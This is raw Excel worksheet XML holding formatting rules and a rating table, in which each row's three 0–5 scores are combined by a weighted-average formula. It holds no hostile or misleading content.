      <c r="H416" s="14"/>
      <c r="I416" s="15"/>
    </row>
    <row r="417" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F417" s="14"/>
      <c r="G417" s="14"/>
      <c r="H417" s="14"/>
      <c r="I417" s="15"/>
    </row>
    <row r="418" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F418" s="14"/>
      <c r="G418" s="14"/>
      <c r="H418" s="14"/>
      <c r="I418" s="15"/>
    </row>
    <row r="419" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F419" s="14"/>
      <c r="G419" s="14"/>
      <c r="H419" s="14"/>
      <c r="I419" s="15"/>
    </row>
    <row r="420" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F420" s="14"/>
      <c r="G420" s="14"/>
      <c r="H420" s="14"/>
      <c r="I420" s="15"/>
    </row>
    <row r="421" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F421" s="14"/>
      <c r="G421" s="14"/>
      <c r="H421" s="14"/>
      <c r="I421" s="15"/>
    </row>
    <row r="422" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F422" s="14"/>
      <c r="G422" s="14"/>
      <c r="H422" s="14"/>
      <c r="I422" s="15"/>
    </row>
    <row r="423" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F423" s="14"/>
      <c r="G423" s="14"/>
      <c r="H423" s="14"/>
      <c r="I423" s="15"/>
    </row>
    <row r="424" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F424" s="14"/>
      <c r="G424" s="14"/>
      <c r="H424" s="14"/>
      <c r="I424" s="15"/>
    </row>
    <row r="425" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F425" s="14"/>
      <c r="G425" s="14"/>
      <c r="H425" s="14"/>
      <c r="I425" s="15"/>
    </row>
    <row r="426" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F426" s="14"/>
      <c r="G426" s="14"/>
      <c r="H426" s="14"/>
      <c r="I426" s="15"/>
    </row>
    <row r="427" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F427" s="14"/>
      <c r="G427" s="14"/>
      <c r="H427" s="14"/>
      <c r="I427" s="15"/>
    </row>
    <row r="428" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F428" s="14"/>
      <c r="G428" s="14"/>
      <c r="H428" s="14"/>
      <c r="I428" s="15"/>
    </row>
    <row r="429" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F429" s="14"/>
      <c r="G429" s="14"/>
      <c r="H429" s="14"/>
      <c r="I429" s="15"/>
    </row>
    <row r="430" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F430" s="14"/>
      <c r="G430" s="14"/>
      <c r="H430" s="14"/>
      <c r="I430" s="15"/>
    </row>
    <row r="431" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F431" s="14"/>
      <c r="G431" s="14"/>
      <c r="H431" s="14"/>
      <c r="I431" s="15"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="I2:I80">
    <cfRule type="dataBar" priority="4">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{E8D27D51-069E-429A-8F09-43FE99525147}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L8">
    <cfRule type="colorScale" priority="5">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F2:H1048576">
    <cfRule type="dataBar" priority="3">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{B7542DF4-7D24-493E-962D-EDAD339DD517}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I81:I268">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{4157CF3F-3FAA-4DD1-932C-59ED1E6BA216}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>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8D27D51-069E-429A-8F09-43FE99525147}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>I2:I80</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{B7542DF4-7D24-493E-962D-EDAD339DD517}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F2:H1048576</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{4157CF3F-3FAA-4DD1-932C-59ED1E6BA216}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>I81:I268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8B24-83F3-4DD6-84AB-5E3AAD13A0D0}">
  <dimension ref="A1:Z431"/>
  <sheetViews>
    <sheetView zoomScale="180" zoomScaleNormal="180" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A28" sqref="A28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="32.1640625" customWidth="1"/>
    <col min="2" max="2" width="47.6640625" customWidth="1"/>
    <col min="3" max="5" width="20.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.5" style="1" customWidth="1"/>
    <col min="7" max="26" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="42" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="44" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="44" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="44" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="31" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" s="41" t="s">
        <v>6</v>
      </c>
      <c r="B2" s="45" t="s">
        <v>7</v>
      </c>
      <c r="C2" s="14">
        <v>5</v>
      </c>
      <c r="D2" s="14">
        <v>4</v>
      </c>
      <c r="E2" s="14">
        <v>3</v>
      </c>
      <c r="F2" s="32">
        <f t="shared" ref="F2:F65" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>4</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" s="41" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="45" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="14">
        <v>1</v>
      </c>
      <c r="D3" s="14">
        <v>1</v>
      </c>
      <c r="E3" s="14">
        <v>2</v>
      </c>
      <c r="F3" s="32">
        <f t="shared" si="0"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" s="41" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="45"/>
      <c r="C4" s="14">
        <v>3</v>
      </c>
      <c r="D4" s="14">
        <v>3</v>
      </c>
      <c r="E4" s="14">
        <v>4</v>
      </c>
      <c r="F4" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" s="41" t="s">
        <v>11</v>
      </c>
      <c r="B5" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="14">
        <v>3</v>
      </c>
      <c r="D5" s="14">
        <v>4</v>
      </c>
      <c r="E5" s="14">
        <v>4</v>
      </c>
      <c r="F5" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" s="41" t="s">
        <v>13</v>
      </c>
      <c r="B6" s="45"/>
      <c r="C6" s="14">
        <v>0</v>
      </c>
      <c r="D6" s="14">
        <v>0</v>
      </c>
      <c r="E6" s="14">
        <v>0</v>
      </c>
      <c r="F6" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A7" s="41" t="s">
        <v>14</v>
      </c>
      <c r="B7" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C7" s="14">
        <v>3</v>
      </c>
      <c r="D7" s="14">
        <v>3</v>
      </c>
      <c r="E7" s="14">
        <v>2</v>
      </c>
      <c r="F7" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A8" s="41" t="s">
        <v>15</v>
      </c>
      <c r="B8" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C8" s="14">
        <v>3</v>
      </c>
      <c r="D8" s="14">
        <v>3</v>
      </c>
      <c r="E8" s="14">
        <v>2</v>
      </c>
      <c r="F8" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A9" s="41" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="45"/>
      <c r="C9" s="14">
        <v>2</v>
      </c>
      <c r="D9" s="14">
        <v>2</v>
      </c>
      <c r="E9" s="14">
        <v>2</v>
      </c>
      <c r="F9" s="32">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A10" s="41" t="s">
        <v>17</v>
      </c>
      <c r="B10" s="45" t="s">
        <v>18</v>
      </c>
      <c r="C10" s="14">
        <v>2</v>
      </c>
      <c r="D10" s="14">
        <v>1</v>
      </c>
      <c r="E10" s="14">
        <v>2</v>
      </c>
      <c r="F10" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A11" s="41" t="s">
        <v>19</v>
      </c>
      <c r="B11" s="45" t="s">
        <v>20</v>
      </c>
      <c r="C11" s="14">
        <v>3</v>
      </c>
      <c r="D11" s="14">
        <v>3</v>
      </c>
      <c r="E11" s="14">
        <v>4</v>
      </c>
      <c r="F11" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A12" s="41" t="s">
        <v>21</v>
      </c>
      <c r="B12" s="45"/>
      <c r="C12" s="14">
        <v>5</v>
      </c>
      <c r="D12" s="14">
        <v>4</v>
      </c>
      <c r="E12" s="14">
        <v>3</v>
      </c>
      <c r="F12" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A13" s="41" t="s">
        <v>22</v>
      </c>
      <c r="B13" s="45"/>
      <c r="C13" s="14">
        <v>2</v>
      </c>
      <c r="D13" s="14">
        <v>1</v>
      </c>
      <c r="E13" s="14">
        <v>4</v>
      </c>
      <c r="F13" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A14" s="41" t="s">
        <v>23</v>
      </c>
      <c r="B14" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C14" s="14">
        <v>3</v>
      </c>
      <c r="D14" s="14">
        <v>4</v>
      </c>
      <c r="E14" s="14">
        <v>4</v>
      </c>
      <c r="F14" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A15" s="41" t="s">
        <v>24</v>
      </c>
      <c r="B15" s="45" t="s">
        <v>25</v>
      </c>
      <c r="C15" s="14">
        <v>4</v>
      </c>
      <c r="D15" s="14">
        <v>4</v>
      </c>
      <c r="E15" s="14">
        <v>4</v>
      </c>
      <c r="F15" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A16" s="41" t="s">
        <v>26</v>
      </c>
      <c r="B16" s="45" t="s">
        <v>27</v>
      </c>
      <c r="C16" s="14">
        <v>5</v>
      </c>
      <c r="D16" s="14">
        <v>4</v>
      </c>
      <c r="E16" s="14">
        <v>3</v>
      </c>
      <c r="F16" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17" s="54" t="s">
        <v>28</v>
      </c>
      <c r="B17" s="45"/>
      <c r="C17" s="14">
        <v>1</v>
      </c>
      <c r="D17" s="14">
        <v>2</v>
      </c>
      <c r="E17" s="14">
        <v>2</v>
      </c>
      <c r="F17" s="32">
        <f t="shared" si="0"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18" s="41" t="s">
        <v>29</v>
      </c>
      <c r="B18" s="45"/>
      <c r="C18" s="14">
        <v>3</v>
      </c>
      <c r="D18" s="14">
        <v>4</v>
      </c>
      <c r="E18" s="14">
        <v>4</v>
      </c>
      <c r="F18" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19" s="41" t="s">
        <v>30</v>
      </c>
      <c r="B19" s="45" t="s">
        <v>31</v>
      </c>
      <c r="C19" s="14">
        <v>0</v>
      </c>
      <c r="D19" s="14">
        <v>0</v>
      </c>
      <c r="E19" s="14">
        <v>0</v>
      </c>
      <c r="F19" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20" s="41" t="s">
        <v>32</v>
      </c>
      <c r="B20" s="45"/>
      <c r="C20" s="14">
        <v>4</v>
      </c>
      <c r="D20" s="14">
        <v>4</v>
      </c>
      <c r="E20" s="14">
        <v>3</v>
      </c>
      <c r="F20" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21" s="41" t="s">
        <v>33</v>
      </c>
      <c r="B21" s="45"/>
      <c r="C21" s="14">
        <v>3</v>
      </c>
      <c r="D21" s="14">
        <v>4</v>
      </c>
      <c r="E21" s="14">
        <v>4</v>
      </c>
      <c r="F21" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22" s="41" t="s">
        <v>34</v>
      </c>
      <c r="B22" s="45" t="s">
        <v>35</v>
      </c>
      <c r="C22" s="14">
        <v>3</v>
      </c>
      <c r="D22" s="14">
        <v>4</v>
      </c>
      <c r="E22" s="14">
        <v>3</v>
      </c>
      <c r="F22" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23" s="41" t="s">
        <v>36</v>
      </c>
      <c r="B23" s="45" t="s">
        <v>31</v>
      </c>
      <c r="C23" s="14">
        <v>0</v>
      </c>
      <c r="D23" s="14">
        <v>0</v>
      </c>
      <c r="E23" s="14">
        <v>0</v>
      </c>
      <c r="F23" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24" s="41"/>
      <c r="B24" s="45"/>
      <c r="C24" s="14">
        <v>0</v>
      </c>
      <c r="D24" s="14">
        <v>0</v>
      </c>
      <c r="E24" s="14">
        <v>0</v>
      </c>
      <c r="F24" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25" s="41"/>
      <c r="B25" s="45"/>
      <c r="C25" s="14">
        <v>0</v>
      </c>
      <c r="D25" s="14">
        <v>0</v>
      </c>
      <c r="E25" s="14">
        <v>0</v>
      </c>
      <c r="F25" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26" s="41"/>
      <c r="B26" s="45"/>
      <c r="C26" s="14">
        <v>0</v>
      </c>
      <c r="D26" s="14">
        <v>0</v>
      </c>
      <c r="E26" s="14">
        <v>0</v>
      </c>
      <c r="F26" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27" s="41"/>
      <c r="B27" s="45"/>
      <c r="C27" s="14">
        <v>0</v>
      </c>
      <c r="D27" s="14">
        <v>0</v>
      </c>
      <c r="E27" s="14">
        <v>0</v>
      </c>
      <c r="F27" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28" s="41"/>
      <c r="B28" s="45"/>
      <c r="C28" s="14">
        <v>0</v>
      </c>
      <c r="D28" s="14">
        <v>0</v>
      </c>
      <c r="E28" s="14">
        <v>0</v>
      </c>
      <c r="F28" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29" s="41"/>
      <c r="B29" s="45"/>
      <c r="C29" s="14">
        <v>0</v>
      </c>
      <c r="D29" s="14">
        <v>0</v>
      </c>
      <c r="E29" s="14">
        <v>0</v>
      </c>
      <c r="F29" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30" s="41"/>
      <c r="B30" s="45"/>
      <c r="C30" s="14">
        <v>0</v>
      </c>
      <c r="D30" s="14">
        <v>0</v>
      </c>
      <c r="E30" s="14">
        <v>0</v>
      </c>
      <c r="F30" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31" s="41"/>
      <c r="B31" s="45"/>
      <c r="C31" s="14">
        <v>0</v>
      </c>
      <c r="D31" s="14">
        <v>0</v>
      </c>
      <c r="E31" s="14">
        <v>0</v>
      </c>
      <c r="F31" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32" s="41"/>
      <c r="B32" s="45"/>
      <c r="C32" s="14">
        <v>0</v>
      </c>
      <c r="D32" s="14">
        <v>0</v>
      </c>
      <c r="E32" s="14">
        <v>0</v>
      </c>
      <c r="F32" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33" s="41"/>
      <c r="B33" s="45"/>
      <c r="C33" s="14">
        <v>0</v>
      </c>
      <c r="D33" s="14">
        <v>0</v>
      </c>
      <c r="E33" s="14">
        <v>0</v>
      </c>
      <c r="F33" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34" s="41"/>
      <c r="B34" s="45"/>
      <c r="C34" s="14">
        <v>0</v>
      </c>
      <c r="D34" s="14">
        <v>0</v>
      </c>
      <c r="E34" s="14">
        <v>0</v>
      </c>
      <c r="F34" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35" s="41"/>
      <c r="B35" s="45"/>
      <c r="C35" s="14">
        <v>0</v>
      </c>
      <c r="D35" s="14">
        <v>0</v>
      </c>
      <c r="E35" s="14">
        <v>0</v>
      </c>
      <c r="F35" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36" s="41"/>
      <c r="B36" s="45"/>
      <c r="C36" s="14">
        <v>0</v>
      </c>
      <c r="D36" s="14">
        <v>0</v>
      </c>
      <c r="E36" s="14">
        <v>0</v>
      </c>
      <c r="F36" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37" s="41"/>
      <c r="B37" s="45"/>
      <c r="C37" s="14">
        <v>0</v>
      </c>
      <c r="D37" s="14">
        <v>0</v>
      </c>
      <c r="E37" s="14">
        <v>0</v>
      </c>
      <c r="F37" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38" s="41"/>
      <c r="B38" s="45"/>
      <c r="C38" s="14">
        <v>0</v>
      </c>
      <c r="D38" s="14">
        <v>0</v>
      </c>
      <c r="E38" s="14">
        <v>0</v>
      </c>
      <c r="F38" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39" s="41"/>
      <c r="B39" s="45"/>
      <c r="C39" s="14">
        <v>0</v>
      </c>
      <c r="D39" s="14">
        <v>0</v>
      </c>
      <c r="E39" s="14">
        <v>0</v>
      </c>
      <c r="F39" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40" s="41"/>
      <c r="B40" s="45"/>
      <c r="C40" s="14">
        <v>0</v>
      </c>
      <c r="D40" s="14">
        <v>0</v>
      </c>
      <c r="E40" s="14">
        <v>0</v>
      </c>
      <c r="F40" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41" s="41"/>
      <c r="B41" s="45"/>
      <c r="C41" s="14">
        <v>0</v>
      </c>
      <c r="D41" s="14">
        <v>0</v>
      </c>
      <c r="E41" s="14">
        <v>0</v>
      </c>
      <c r="F41" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42" s="41"/>
      <c r="B42" s="45"/>
      <c r="C42" s="14">
        <v>0</v>
      </c>
      <c r="D42" s="14">
        <v>0</v>
      </c>
      <c r="E42" s="14">
        <v>0</v>
      </c>
      <c r="F42" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43" s="41"/>
      <c r="B43" s="45"/>
      <c r="C43" s="14">
        <v>0</v>
      </c>
      <c r="D43" s="14">
        <v>0</v>
      </c>
      <c r="E43" s="14">
        <v>0</v>
      </c>
      <c r="F43" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44" s="41"/>
      <c r="B44" s="45"/>
      <c r="C44" s="14">
        <v>0</v>
      </c>
      <c r="D44" s="14">
        <v>0</v>
      </c>
      <c r="E44" s="14">
        <v>0</v>
      </c>
      <c r="F44" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45" s="41"/>
      <c r="B45" s="45"/>
      <c r="C45" s="14">
        <v>0</v>
      </c>
      <c r="D45" s="14">
        <v>0</v>
      </c>
      <c r="E45" s="14">
        <v>0</v>
      </c>
      <c r="F45" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46" s="41"/>
      <c r="B46" s="45"/>
      <c r="C46" s="14">
        <v>0</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>0</v>
      </c>
      <c r="F46" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47" s="41"/>
      <c r="B47" s="45"/>
      <c r="C47" s="14">
        <v>0</v>
      </c>
      <c r="D47" s="14">
        <v>0</v>
      </c>
      <c r="E47" s="14">
        <v>0</v>
      </c>
      <c r="F47" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48" s="41"/>
      <c r="B48" s="45"/>
      <c r="C48" s="14">
        <v>0</v>
      </c>
      <c r="D48" s="14">
        <v>0</v>
      </c>
      <c r="E48" s="14">
        <v>0</v>
      </c>
      <c r="F48" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A49" s="41"/>
      <c r="B49" s="45"/>
      <c r="C49" s="14">
        <v>0</v>
      </c>
      <c r="D49" s="14">
        <v>0</v>
      </c>
      <c r="E49" s="14">
        <v>0</v>
      </c>
      <c r="F49" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A50" s="41"/>
      <c r="B50" s="45"/>
      <c r="C50" s="14">
        <v>0</v>
      </c>
      <c r="D50" s="14">
        <v>0</v>
      </c>
      <c r="E50" s="14">
        <v>0</v>
      </c>
      <c r="F50" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A51" s="41"/>
      <c r="B51" s="45"/>
      <c r="C51" s="14">
        <v>0</v>
      </c>
      <c r="D51" s="14">
        <v>0</v>
      </c>
      <c r="E51" s="14">
        <v>0</v>
      </c>
      <c r="F51" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A52" s="41"/>
      <c r="B52" s="45"/>
      <c r="C52" s="14">
        <v>0</v>
      </c>
      <c r="D52" s="14">
        <v>0</v>
      </c>
      <c r="E52" s="14">
        <v>0</v>
      </c>
      <c r="F52" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A53" s="41"/>
      <c r="B53" s="45"/>
      <c r="C53" s="14">
        <v>0</v>
      </c>
      <c r="D53" s="14">
        <v>0</v>
      </c>
      <c r="E53" s="14">
        <v>0</v>
      </c>
      <c r="F53" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A54" s="41"/>
      <c r="B54" s="45"/>
      <c r="C54" s="14">
        <v>0</v>
      </c>
      <c r="D54" s="14">
        <v>0</v>
      </c>
      <c r="E54" s="14">
        <v>0</v>
      </c>
      <c r="F54" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A55" s="41"/>
      <c r="B55" s="45"/>
      <c r="C55" s="14">
        <v>0</v>
      </c>
      <c r="D55" s="14">
        <v>0</v>
      </c>
      <c r="E55" s="14">
        <v>0</v>
      </c>
      <c r="F55" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A56" s="41"/>
      <c r="B56" s="45"/>
      <c r="C56" s="14">
        <v>0</v>
      </c>
      <c r="D56" s="14">
        <v>0</v>
      </c>
      <c r="E56" s="14">
        <v>0</v>
      </c>
      <c r="F56" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
